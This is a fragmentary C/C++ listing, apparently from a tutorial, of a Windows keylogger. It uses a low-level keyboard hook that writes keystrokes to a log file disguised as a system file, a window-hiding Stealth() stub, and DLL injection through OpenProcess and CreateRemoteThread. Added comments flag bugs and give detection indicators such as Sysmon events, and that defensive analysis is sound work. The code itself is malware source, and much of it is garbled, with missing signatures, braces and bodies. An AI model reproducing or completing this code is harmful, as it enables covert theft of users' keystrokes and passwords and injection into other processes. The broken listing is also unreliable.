#include <Windows.h>
#include <time.h>
#include <iostream>
#include <cstdio>
// Variable to store the HANDLE to the hook. Don't declare it anywhere other than globally,
// or you will get problems, since every function uses this variable.
// NOTE(review): a name with a leading underscore at global scope is reserved for the
// implementation; a name such as g_hook would avoid that.
HHOOK _hook;
// This struct contains the data received by the hook callback. As you see in the callback
// function, it contains the thing you will need: vkCode = virtual key code.
// It is a single file-scope copy that the callback overwrites on each handled event.
KBDLLHOOKSTRUCT kbdStruct;
// This is the callback function. Consider it the event that is raised when, in this case,
// a key is pressed.
// NOTE(review): the callback's signature line is missing from this listing; nCode, wParam
// and lParam used below are presumably its parameters.
if (nCode >= 0)
{
// the action is valid: HC_ACTION.
// Only key-down messages are handled by the branch below.
if (wParam == WM_KEYDOWN)
// lParam is the pointer to the struct containing the data needed, so cast and
// assign it to kbdStruct.
// Copy the event data out of the structure that lParam points to.
kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);
// save to file
// Detection note: the log path is a hard-coded file in the root of the C: drive whose name
// imitates a system component. A non-system process creating or appending to this file is a
// usable file-creation indicator for endpoint monitoring.
Save(kbdStruct.vkCode, "C:\\System32Log.txt");
// call the next hook in the hook chain. This is necessary or your hook chain will break and the
// hook stops
void SetHook()
// Set the hook and set it to use the callback function above
// WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at
// MSDN.
// The last 2 parameters are NULL, 0 because the callback function is in the same thread and
// window as the
}
// Removes the hook stored in the global _hook by passing it to UnhookWindowsHookEx.
// The BOOL result of UnhookWindowsHookEx is discarded, so a failed unhook goes unnoticed.
// NOTE(review): the opening brace of this function is missing from the listing.
void ReleaseHook()
UnhookWindowsHookEx(_hook);
}
// Window title remembered from the previous call; compared below so that the title is
// handled only when it changes.
char lastwindow[256];
// Log file stream kept at file scope; the fopen call that sets it is not in this listing.
FILE *OUTPUT_FILE;
// NOTE(review): the signature of the logging function and several of its statements and
// braces are missing from this listing; what follows is a fragment of its body.
if (foreground)
char window_title[256];
// strcmp/strcpy rely on window_title being NUL-terminated; the call that fills it is not
// shown. Both buffers are 256 bytes, so the copy stays in bounds when that holds.
if(strcmp(window_title, lastwindow)!=0) {
strcpy(lastwindow, window_title);
// get time
time_t t = time(NULL);
char s[64];
if (key_stroke == VK_BACK)
else {
// NOTE(review): 48 is the character code of '0'; why it is subtracted is not visible here.
key_stroke -= 48;
// NOTE(review): confirm OUTPUT_FILE was opened successfully before this point; fclose on a
// null stream is undefined behaviour.
fclose(OUTPUT_FILE);
return 0;
// Stealth(): selects one of two build-time variants with #ifdef. The bodies of both branches
// and the function's braces are missing from this listing; main()'s comment describes the
// call as setting the "visibility of window".
// NOTE(review): `visible` and `invisible` are not defined anywhere in the visible listing;
// if neither is defined, both branches compile to nothing.
void Stealth()
#ifdef visible
#endif // visible
#ifdef invisible
#endif // invisible
// Entry point: calls Stealth(), then SetHook(), then declares a MSG, presumably for a
// message loop that is not shown. The function's braces and return are missing from the
// listing.
// Detection note: a process that holds a WH_KEYBOARD_LL hook while showing no window of its
// own is a behaviour that endpoint tooling can alert on.
int main()
// visibility of window
Stealth();
// Set the hook
SetHook();
MSG msg;
Making a DLL
#include <windows.h>
#define BUILD_DLL
#ifdef BUILD_DLL
#else
#endif
// DllMain: called with fdwReason set to one of the four DLL_* reasons handled below.
// Every case is empty here, so the function only reports success by returning TRUE.
// NOTE(review): DLL_EXPORT is not defined in the visible listing (the #ifdef BUILD_DLL
// branches above are empty), and the braces of the function and the switch are missing.
// Detection note: code placed under DLL_PROCESS_ATTACH runs when the module is loaded into a
// process, so image-load telemetry (e.g. Sysmon Event ID 7) for unsigned DLLs appearing in
// unrelated processes is where a DLL delivered as in the "DLL Injection" section shows up.
extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpvReserved)
switch (fdwReason)
case DLL_PROCESS_ATTACH:
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
return TRUE;
// Walks a process snapshot and prints each entry's executable name and process id.
// NOTE(review): the declarations of mySnapShot and myProcInf and the call that creates the
// snapshot are missing from this listing.
if(mySnapShot == INVALID_HANDLE_VALUE)
exit(-1);
// NOTE(review): as printed, only CloseHandle is governed by this if and exit(-1) runs
// unconditionally; the braces were presumably lost along with the other missing lines.
if(!Process32First(mySnapShot,&myProcInf))
CloseHandle(mySnapShot);
exit(-1);
do
{
// NOTE(review): th32ProcessID is a DWORD (unsigned long); %lu is the matching conversion,
// not %ld.
printf("%50s%5s:%5s%ld\n", myProcInf.szExeFile,"","",myProcInf.th32ProcessID);
}while(Process32Next(mySnapShot,&myProcInf));
// NOTE(review): no CloseHandle(mySnapShot) is visible after the loop; confirm the snapshot
// handle is released on the success path.
DLL Injection
Make a handle
// Opens the process identified by ProcID with thread-creation, query and memory access rights.
// NOTE(review): the Windows handle type is HANDLE; `Handle` as written is not declared in
// this listing. The result of OpenProcess is not checked in the lines shown.
// Detection note: PROCESS_CREATE_THREAD together with PROCESS_VM_OPERATION and
// PROCESS_VM_WRITE requested on another process is the access pattern that process-access
// telemetry (e.g. Sysmon Event ID 10, GrantedAccess field) is commonly tuned to flag.
Handle ProcHandler = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ProcID);
// ProcID is process ID
Create a thread
// Starts a thread in the process behind ProcHandler and stores the returned handle.
// NOTE(review): the declarations of threadHandler, MyStartExecutionAddress and
// DllAllocatedAddress are not in this listing, and the result is not checked in the lines
// shown.
// Detection note: thread creation in another process is recorded by Sysmon as Event ID 8
// (CreateRemoteThread) with the source and target images; alerting on sources that are not
// known debuggers or security tools covers this step.
threadHandler =
CreateRemoteThread(ProcHandler,NULL,0,MyStartExecutionAddress,DllAllocatedAddress,0,NULL);